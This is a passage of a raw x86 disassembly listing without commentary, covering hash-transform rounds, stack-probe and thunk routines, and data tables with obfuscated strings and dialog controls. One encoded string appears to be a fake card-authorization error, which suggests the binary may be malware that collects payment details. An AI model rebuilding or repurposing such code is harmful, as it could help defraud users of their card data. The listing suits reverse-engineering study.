mov ecx, [edi]
mov edx, [edi+4]
call sub_424633
add eax, [edi+8]
add eax, [esi+0Ch]
add eax, 0D4EF3085h
rol eax, 10h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_424633
add eax, [edi+4]
add eax, [esi+18h]
add eax, 4881D05h
rol eax, 17h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_424633
add eax, [edi]
add eax, [esi+24h]
add eax, 0D9D4D039h
rol eax, 4
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_424633
add eax, [edi+0Ch]
add eax, [esi+30h]
add eax, 0E6DB99E5h
rol eax, 0Bh
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_424633
add eax, [edi+8]
add eax, [esi+3Ch]
add eax, 1FA27CF8h
rol eax, 10h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_424633
add eax, [edi+4]
add eax, [esi+8]
add eax, 0C4AC5665h
rol eax, 17h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_42463A
add eax, [edi]
add eax, [esi]
add eax, 0F4292244h
rol eax, 6
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_42463A
add eax, [edi+0Ch]
add eax, [esi+1Ch]
add eax, 432AFF97h
rol eax, 0Ah
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_42463A
add eax, [edi+8]
add eax, [esi+38h]
add eax, 0AB9423A7h
rol eax, 0Fh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_42463A
add eax, [edi+4]
add eax, [esi+14h]
add eax, 0FC93A039h
rol eax, 15h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_42463A
add eax, [edi]
add eax, [esi+30h]
add eax, 655B59C3h
rol eax, 6
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_42463A
add eax, [edi+0Ch]
add eax, [esi+0Ch]
add eax, 8F0CCC92h
rol eax, 0Ah
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_42463A
add eax, [edi+8]
add eax, [esi+28h]
add eax, 0FFEFF47Dh
rol eax, 0Fh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_42463A
add eax, [edi+4]
add eax, [esi+4]
add eax, 85845DD1h
rol eax, 15h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_42463A
add eax, [edi]
add eax, [esi+20h]
add eax, 6FA87E4Fh
rol eax, 6
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_42463A
add eax, [edi+0Ch]
add eax, [esi+3Ch]
add eax, 0FE2CE6E0h
rol eax, 0Ah
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_42463A
add eax, [edi+8]
add eax, [esi+18h]
add eax, 0A3014314h
rol eax, 0Fh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_42463A
add eax, [edi+4]
add eax, [esi+34h]
add eax, 4E0811A1h
rol eax, 15h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_42463A
add eax, [edi]
add eax, [esi+10h]
add eax, 0F7537E82h
rol eax, 6
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_42463A
add eax, [edi+0Ch]
add eax, [esi+2Ch]
add eax, 0BD3AF235h
rol eax, 0Ah
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_42463A
add eax, [edi+8]
add eax, [esi+8]
add eax, 2AD7D2BBh
rol eax, 0Fh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_42463A
add eax, [edi+4]
add eax, [esi+24h]
add eax, 0EB86D391h
rol eax, 15h
add eax, [edi+8]
mov [edi+4], eax
mov eax, ds:10013A0Ch
add [edi], eax
mov eax, ds:10013A10h
add [edi+4], eax
mov eax, ds:10013A14h
add [edi+8], eax
mov eax, ds:10013A18h
add [edi+0Ch], eax
popa
pop ebp
xor eax, eax
retn 8
sub_42466A endp
; =============== S U B R O U T I N E =======================================
sub_424EB5 proc near ; CODE XREF: sub_424ED2+1E�p
var_FFC = dword ptr -0FFCh
pop ecx
loc_424EB6: ; CODE XREF: sub_424EB5+14�j
sub esp, 1000h
sub eax, 1000h
test [esp+0FFCh+var_FFC], eax
cmp eax, 1000h
jnb short loc_424EB6
sub esp, eax
test [esp+0FFCh+var_FFC], eax
push ecx
retn
sub_424EB5 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_424ED2 proc near ; CODE XREF: sub_41DCB0+38�p
arg_0 = dword ptr 4
pop ecx
pop eax
add eax, 3
shr eax, 2
shl eax, 2
cmp eax, 1000h
jl short loc_424F02
mov edx, esp
push eax
fild [esp-4+arg_0]
mov [esp-4+arg_0], ecx
fild [esp-4+arg_0]
call sub_424EB5
mov esp, edx
push edx
fistp dword ptr [esp+0]
mov ecx, [esp+0]
fistp dword ptr [esp+0]
pop eax
loc_424F02: ; CODE XREF: sub_424ED2+10�j
sub esp, eax
mov eax, esp
mov dword ptr [eax], 0
push ecx
push ecx
retn
sub_424ED2 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
dd 40C03100h, 0CC2h, 3CD95000h, 24048B24h, 2434BA0Fh, 0C816608h
db 24h, 0, 2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424F3C
loc_424F2B: ; CODE XREF: sub_424F3C+D�j
fldcw word ptr [esp+4+var_4]
pop ecx
mov al, ah
and eax, 3
retn
; END OF FUNCTION CHUNK FOR sub_424F3C
; ---------------------------------------------------------------------------
db 50h, 0D9h, 3Ch
dd 0F3EB5824h
; =============== S U B R O U T I N E =======================================
sub_424F3C proc near ; CODE XREF: .data:loc_41A5B4�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00424F2B SIZE 0000000A BYTES
push eax
fnstcw word ptr [esp+4+var_4]
mov eax, [esp+4+var_4]
or word ptr [esp+4+var_4], 300h
jmp short loc_424F2B
sub_424F3C endp
; ---------------------------------------------------------------------------
align 4
db 0
; =============== S U B R O U T I N E =======================================
sub_424F4D proc near ; CODE XREF: sub_41B66D+8�p
; sub_41BB8D+8�p ...
var_FFC = dword ptr -0FFCh
pop ecx
loc_424F4E: ; CODE XREF: sub_424F4D+14�j
sub esp, 1000h
sub eax, 1000h
test [esp+0FFCh+var_FFC], eax
cmp eax, 1000h
jnb short loc_424F4E
sub esp, eax
test [esp+0FFCh+var_FFC], eax
jmp ecx
sub_424F4D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
db 0
; =============== S U B R O U T I N E =======================================
sub_424F6D proc near ; CODE XREF: .data:0041AED7�p
; .data:0041AEEA�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
xor eax, eax
mov ecx, 0FFFFFFFFh
xchg edi, edx
repne scasb
neg ecx
lea ecx, [ecx-1]
mov eax, [esp+arg_4]
xchg eax, esi
mov edi, [esp+arg_0]
rep movsb
xchg eax, esi
xchg edx, edi
mov eax, [esp+arg_0]
retn 8
sub_424F6D endp
; ---------------------------------------------------------------------------
align 4
dd 0AC25FF00h, 90100140h, 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_424FA5 proc near ; CODE XREF: sub_41A669+10�p
jmp dword ptr ds:100140B0h
sub_424FA5 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_424FB1 proc near ; CODE XREF: sub_41A48D+13�p
jmp dword ptr ds:100140B4h
sub_424FB1 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_424FBD proc near ; CODE XREF: sub_41A5D0+33�p
; sub_41A5D0+45�p ...
jmp dword ptr ds:100140C0h
sub_424FBD endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_424FC9 proc near ; CODE XREF: sub_41A5D0+B�p
; sub_41A5D0+17�p ...
jmp dword ptr ds:100140C4h
sub_424FC9 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h, 0C825FF00h, 90100140h, 90h, 0CC25FF00h, 90100140h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_424FED proc near ; CODE XREF: sub_41A669+4E�p
; sub_41A669+87�p
jmp dword ptr ds:100140D0h
sub_424FED endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_424FF9 proc near ; CODE XREF: .data:0041A593�p
jmp dword ptr ds:100140D4h
sub_424FF9 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_425005 proc near ; CODE XREF: sub_41A5D0+71�p
; sub_41A5D0+86�p
jmp dword ptr ds:100140D8h
sub_425005 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_425011 proc near ; CODE XREF: sub_41A669+9E�p
jmp dword ptr ds:100140DCh
sub_425011 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h, 7Ch dup(0)
dd 0BB0400h, 10h, 4 dup(0)
dd 732500h, 72007700h, 1Ch dup(0)
dd 100h, 600h, 700h, 800h, 400h, 200h, 2 dup(300h), 2 dup(800h)
dd 400h, 900h, 100h, 400h, 700h, 100h, 0
dd 100h, 500h, 600h, 0
dd 200h, 2 dup(500h), 400h, 900h, 200h, 700h, 900h, 300h
dd 0
dd 700h, 400h, 200h, 100h, 300h, 200h, 100h, 0
dd 500h, 0
dd 300h, 800h, 200h, 800h, 500h, 300h, 600h, 500h, 800h
dd 0
dd 400h, 800h, 0
dd 800h, 400h, 800h, 900h, 300h, 3 dup(600h), 0
dd 100h, 300h, 0
dd 800h, 2 dup(600h), 2 dup(0)
dd 400h, 0
dd 100h, 300h, 600h, 300h, 500h, 200h, 400h, 0Bh dup(0)
dd 1385700h, 0E86010h, 61000000h, 0E9h, 0
dd 1100h, 0Fh dup(0)
db 0
db 0A5h, 0EEh, 0F7h
db 0E1h ;
db 2Ch, 7Eh, 0FDh
db 0BFh ;
db 7Fh, 0E8h, 9Ah
db 86h ;
db 82h, 40h, 24h
db 0CCh ;
db 0E2h, 0DDh, 6Ah
db 0D7h ;
db 2 dup(0E1h), 77h
db 1Bh
db 0B0h, 15h, 52h
db 50h ; P
db 56h, 64h, 4Bh
db 0D2h ;
db 6Bh, 7Ch, 35h
db 3Dh ; =
db 0D5h, 85h, 0Eh
db 28h ; (
db 0F9h, 51h, 0B0h
db 1Ah
db 44h, 87h, 4Eh
db 1Eh
db 0DFh, 0CCh, 83h
db 0E3h ;
db 37h, 47h, 3Dh
db 32h ; 2
db 18h, 5, 0F8h
db 14h
db 0BFh, 37h, 6
db 6Eh ; n
align 10h
db 0
db 0E0h, 70h, 0
db 10h
db 82h, 1Ah, 0
db 10h
db 0A6h, 4Dh, 0
db 10h
db 18h, 80h, 0
db 10h
db 0A4h, 4Ah, 0
db 10h
db 0FEh, 72h, 0
db 10h
db 0Ah, 54h, 0
db 10h
align 10h
db 0
db 0C2h, 30h, 0
db 10h
db 24h, 13h, 0
db 10h
db 0Ah, 72h, 0
db 10h
db 0B9h, 94h, 0
db 10h
db 7Ah, 21h, 0
db 10h
db 49h, 5Ah, 0
db 10h
db 0A3h, 95h, 0
db 10h
db 0B4h, 22h, 1
db 10h
align 4
db 0
db 6Ch, 0A8h, 0
db 10h
db 3Dh, 31h, 0
db 10h
db 74h, 48h, 0
db 10h
db 5Dh, 0A5h, 0
db 10h
db 78h, 27h, 0
db 10h
db 98h, 5Eh, 0
db 10h
db 24h, 73h, 0
db 10h
db 0D8h, 22h, 1
db 10h
aCreatethread_1 db 'CreateThread',0
aEntercritica_0 db 'EnterCriticalSection',0
aInitializecr_0 db 'InitializeCriticalSection',0
aLeavecritica_0 db 'LeaveCriticalSection',0
align 4
db 0
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3Eh, 2 dup(0)
db 0
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3Fh, 2 dup(0)
db 0
db 34h, 2 dup(0)
db 0
db 35h, 2 dup(0)
db 0
db 36h, 2 dup(0)
db 0
db 37h, 2 dup(0)
db 0
db 38h, 2 dup(0)
db 0
db 39h, 2 dup(0)
db 0
db 3Ah, 2 dup(0)
db 0
db 3Bh, 2 dup(0)
db 0
db 3Ch, 2 dup(0)
db 0
db 3Dh, 2 dup(0)
db 0
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
align 10h
db 0
db 1, 2 dup(0)
db 0
db 2, 2 dup(0)
db 0
db 3, 2 dup(0)
db 0
db 4, 2 dup(0)
db 0
db 5, 2 dup(0)
db 0
db 6, 2 dup(0)
db 0
db 7, 2 dup(0)
db 0
db 8, 2 dup(0)
db 0
db 9, 2 dup(0)
db 0
db 0Ah, 2 dup(0)
db 0
db 0Bh, 2 dup(0)
db 0
db 0Ch, 2 dup(0)
db 0
db 0Dh, 2 dup(0)
db 0
db 0Eh, 2 dup(0)
db 0
db 0Fh, 2 dup(0)
db 0
db 10h, 2 dup(0)
db 0
db 11h, 2 dup(0)
db 0
db 12h, 2 dup(0)
db 0
db 13h, 2 dup(0)
db 0
db 14h, 2 dup(0)
db 0
db 15h, 2 dup(0)
db 0
db 16h, 2 dup(0)
db 0
db 17h, 2 dup(0)
db 0
db 18h, 2 dup(0)
db 0
db 19h, 2 dup(0)
db 0
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 1Ah, 2 dup(0)
db 0
db 1Bh, 2 dup(0)
db 0
db 1Ch, 2 dup(0)
db 0
db 1Dh, 2 dup(0)
db 0
db 1Eh, 2 dup(0)
db 0
db 1Fh, 2 dup(0)
db 0
db 20h, 2 dup(0)
db 0
db 21h, 2 dup(0)
db 0
db 22h, 2 dup(0)
db 0
db 23h, 2 dup(0)
db 0
db 24h, 2 dup(0)
db 0
db 25h, 2 dup(0)
db 0
db 26h, 2 dup(0)
db 0
db 27h, 2 dup(0)
db 0
db 28h, 2 dup(0)
db 0
db 29h, 2 dup(0)
db 0
db 2Ah, 2 dup(0)
db 0
db 2Bh, 2 dup(0)
db 0
db 2Ch, 2 dup(0)
db 0
db 2Dh, 2 dup(0)
db 0
db 2Eh, 2 dup(0)
db 0
db 2Fh, 2 dup(0)
db 0
db 30h, 2 dup(0)
db 0
db 31h, 2 dup(0)
db 0
db 32h, 2 dup(0)
db 0
db 33h, 2 dup(0)
db 0
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 3 dup(0FFh)
db 0FFh
db 0C8h, 0A3h, 0
db 10h
db 0D0h, 0A3h, 0
db 10h
db 13h, 0A4h, 0
db 10h
db 51h, 0A4h, 0
db 10h
db 4, 0, 0F4h
aSz db 'ښ',0
db 1, 0, 77h
db 2Bh ; +
align 2
aSS_1 db '%s%s\',0
db 3
align 2
aAd2k db 'Ad2k',0
db 4
db 0
db 0C5h, 0E0h, 0A6h
db 0FFh
db 99h, 0, 6
db 0
db 35h, 2 dup(5Eh)
db 44h ; D
db 18h, 43h, 4Dh
db 0
db 8, 0, 0C1h
aFUmF db '䲞',0
db 4, 2 dup(0)
db 0
db 2Fh, 0, 6Dh
db 0
db 60h, 0, 6Bh
db 0
db 76h, 2 dup(0)
db 0
db 4, 0, 57h
aY36 db 'y36#',0
db 6, 0, 0A7h
aK db '֊',0
db 6
db 0
aBbC db 'ʡ缲',0
db 6, 0, 0FDh
aCcmLe db 'Ћ',0
db 6
db 0
aUeeqSc db 'Ø',0
db 8,0
db 6Ch
db 49h ; I
db 1Fh, 33h, 1
db 18h
db 14h, 49h, 19h
db 0
db 0Ah, 0, 6Ch
db 1Fh
db 0Ah, 0Fh, 33h
db 3
db 1Fh, 42h, 8
db 0
db 2 dup(0), 0Ah
db 0
db 1Bh, 68h, 7Dh
db 78h ; x
db 44h, 74h, 68h
db 35h ; 5
db 7Fh, 2 dup(77h)
db 0
db 6, 0, 7Fh
db 0Ch
db 0Bh, 0Dh, 1Ch
db 0Fh
db 6, 0, 8
db 0
aO db '',0
db 7,0
db 0F9h, 8Ah, 89h
aLrcnq db '',0
dw 6
aVegE db 'Ѣ',0
db 5
align 2
dw 97Ah
db 8
db 1Bh, 14h, 1Eh
db 0
db 4, 0, 0EAh
aSldo db '',0
db 6, 0, 0DEh
aNK db '',0
db 6
db 0
aOz db '',0
db 6, 0, 97h
db 0FAh ;
db 0F2h, 0FAh, 0F4h
db 0FAh ;
db 0E7h, 0, 6
db 0
db 'ڷ',0
db 4, 0, 0E2h
aDrzz db '',0
db 4, 0, 10h
db 71h ; q
db 64h, 7Fh, 79h
db 0
db 7, 0, 4Ch
a89 db '8#9<<)>',0
db 6
align 2
dw 316Eh
db 1Dh
db 2, 2 dup(0Bh)
db 1Eh
align 2
dw 0Ah
aGN db 'ύ',0
db 0Ah,0
dw 4122h
db 50h ; P
db 56h, 46h, 4Eh
db 4Eh ; N
db 0Ch, 46h, 4Eh
db 4Eh ; N
align 2
dw 12h
db 81h ;
db 0D2h, 0E7h, 0E2h
db 0C8h ;
db 0F2h, 0C7h, 0E8h
db 0EDh ;
db 0E4h, 0D1h, 0F3h
db 0EEh ;
db 0F5h, 0E4h, 0E2h
db 0F5h ;
db 0E4h, 0E5h, 0
db 7
align 2
aNG db '',0
db 7,0
a8P22 db '^-8=p:22',0
db 0Bh,0
aSgxbeCesf db 'Й',0
db 0Eh, 0, 40h
db 3
db 2Fh, 15h, 2Eh
a_4 db ').)4)!,):%',0
db 0Ch
db 0
aQwpwjw_rwd db '>}QwPWJW_RWD[',0
db 10h
db 0
db 5Dh, 1Eh, 32h
db 1Eh
db 2Fh, 38h, 3Ch
db 29h ; )
db 38h, 14h, 33h
a_38 db '.)<3>8',0
db 0Fh
db 0
db 64h, 27h, 28h
db 37h ; 7
db 2Dh, 20h, 22h
db 16h
db 0Bh, 9, 37h
db 10h
db 16h, 0Dh, 0Ah
db 3
align 2
dw 9
db 16h
aYzs8rzz db 'yzs%$8rzz',0
db 9,0
db 0C5h, 0AAh, 0A9h
db 0A0h ;
db 0F6h, 0F7h, 0EBh
db 0A1h ;
db 2 dup(0A9h), 0
db 11h
align 2
dw 0CB82h
db 0ECh ;
db 0F6h, 0E7h, 0F0h
db 0ECh ;
db 0E7h, 0F6h, 0A2h
db 0C7h ;
db 0FAh, 0F2h, 0EEh
db 0EDh ;
db 0F0h, 0E7h, 0F0h
db 0
db 1, 0, 2Dh
db 0Eh
align 2
dw 1
db 0Bh
db 28h, 0, 1
db 0
db 3, 20h, 0
db 7
align 2
aH8rgg db 'H <<8rgg',0
db 1
db 0
db 0E3h, 0C0h, 0
db 7
align 2
dw 5F37h
db 43h ; C
db 43h, 47h, 0Dh
db 18h
db 18h, 0, 2Bh
db 4
db 0F3h, 90h, 9Bh
aCricagbcaaAxFQ db 'ݚДݐКݐЄݐ݁Є݀ݒ'
db 'ݐАݝНݖݐЄ݃ݐЄ݀'
db 'ݐ݆МݝݐЄݑ݁ОދݐЄ݃'
db 'ݐЄݑޑސݐЄ݃ݐЄݑݐЃ'
db 'ݐЖݐЄݑݐЄݐݐЄ݅݁Є'
db 'ݐݐДݐЄ݃ݐЄݞ݁Є݆'
db '݁ДݐЄ݃ݐЄ݄ݜЄ'
db 'ݐݐЄ݃ݐЄݑݐЄ'
db 'ݚ݁Бݛޜݐ݆Є݄݅Єݘ'
db '݁ЄݝݐИݐЄ݄݅О'
db 'ݒݐ݆Мޑݟݐ݆'
db 'ЄݒݐЄ݁ݐЄ݃ݐЄݛݐ'
db 'И݁ЊݑИޑ݁Єݟݟ'
db 'ݐБݐЇݐЄݝݐݐ'
db 'Є݄݅ЄݑއݐЄ݄݅М'
db 'ݐЇޝ݁Ѐ݁Ѐ݁ЕݑД'
db '݁Ѕ݄',0
aClickOnceToC_0 db 'Click Once To Continue',0
aButton_0 db 'BUTTON',0
db 1Eh
align 2
aP5919?P415zzz1 db 'p5( 9"1$9?>P41$5zzz1$=P 9>P3?45',0
dw 6
aI_0 db 'i:=(= *',0
aEdit_0 db 'EDIT',0
db 6, 0, 2Eh
db 1Ch
db 1Eh, 0Bh, 0
db 1Ch
db 5Bh, 0, 4
db 0
db 3Bh, 1Eh, 15h
db 9
db 4Eh, 2 dup(0)
aCombobox_0 db 'COMBOBOX',0
db 6, 0, 23h
aPwbwj db 'pwbwj`',0
aN db 'n',0
db 40h, 15h, 2Eh
a4542Nje30233__ db '!",%`4/`!54(/2):%nJe3`02/#%33).',27h,'`#%.4%2`)3`5.!",%`4/`!54(/2):%'
db '`9/52`#!2$`e3nJ',0Dh,'!+%`#/22%#4)/.3`!.$`429`!',27h,'!).n',0
db 0Ah,0
db 54h
db 19h
db 35h, 27h, 20h
db 31h ; 1
db 26h, 17h, 35h
db 26h ; &
db 30h, 0, 56h
db 49h ; I
db 53h, 41h, 0
db 20h
align 2
aStatic_0 db 'STATIC',0
db 2 dup(0), 0A7h
db 0
db 6, 0, 0EBh
aKVi db '',0
db 15h
db 0
